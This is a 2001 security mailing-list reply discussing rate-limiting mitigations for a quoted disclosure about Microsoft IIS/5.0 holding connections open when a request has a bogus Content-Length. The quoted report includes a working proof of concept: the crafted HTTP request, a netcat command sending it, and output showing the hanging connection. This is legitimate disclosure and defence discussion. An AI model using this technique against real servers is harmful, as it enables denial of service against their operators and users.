Ivan et al., Well if the server *never* closes the connection I'd think (off of the top of my head) that this is a bad thing. I would think there should be a timeout. However, even with a timeout the problem is still there. If you set the timeout to 10 seconds (to pick a random value) I'd answer that by saying "well make the requests faster". 5 seconds, make them even faster.....you get the point. The concept behind this bug/attack/DoS/whatever you want to call it is similar to so many others we see. User sends a bogus request which takes advantage of a protocol specification and in doing so causes the server to hang as it anticipates more data. I'd put this in the same category as so many of the SYN attacks we see. While I don't think there is a sure fire fix, the approach I'd think is to limit the "amount of service" that a user can request. IE if you see that IP address A.B.C.D makes 500 requests in a second or 2 (or whatever threshold you select), that's probably a sign of something that isn't quite right. Of course you could spoof your IP and select tons of random IP's out there.....for that I don't have a great answer. I'd think maybe if you see too many of any one "type" of request that's a bad sign, but designing a heuristic to identify a type of request that is general enough to really encompass all of the possibilities without denying legitimate users access to the resources at hand seems like a non-trivial exercise. Eric -------------------------------------------- Eric Fleischman Systems Engineer Synergy Brands, Inc. -----Original Message----- From: Ivan Hernandez Puga [mailto:ivan.hernandez@globalsis.com.ar] Sent: Tuesday, December 11, 2001 10:32 AM To: focus-ms@securityfocus.com Cc: bugtraq@securityfocus.com Subject: Microsoft IIS/5 bogus Content-length bug. Let's say that it's a bug, not a security flaw, but probably can lead into denial of service with some tweaking. When you send a bad request to Microsoft IIS/5.0 server it gives you the error and closes the connection, like when you fail to authenticate. Well... let's take a look to a normal request: GET /testfile HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: 192.168.0.10 Connection: Keep-Alive Authorization: Basic And then let's add a "Content-Length: 5300643" field. When you send the new request to the server ir hangs there waiting something to happen and never closes the connection. Let's try this: $ cat " GET /testfile HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */* Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Host: 192.168.0.10 Connection: Keep-Alive Content-Length: 5300643 Authorization: Basic" >bogus.txt $ nc 192.168.0.10 80 <bogus.txt & $ ps x PID PPID PGID WINPID TTY UID STIME COMMAND 696 1 696 696 con 500 12:22:37 /usr/bin/bash 2464 696 2464 2464 con 500 12:23:56 /usr/bin/nc 2532 696 2532 1552 con 500 12:29:16 /usr/bin/ps $ netstat -an |grep 192.168.0.10 TCP 192.168.0.4:2479 192.168.0.10:80 ESTABLISHED Now you have a waiting open connection. You can open as much as you want. The server never stops the connections and I have seen no timeout. Well, I left this here. Thanks for the time of reading Ivan Hernandez
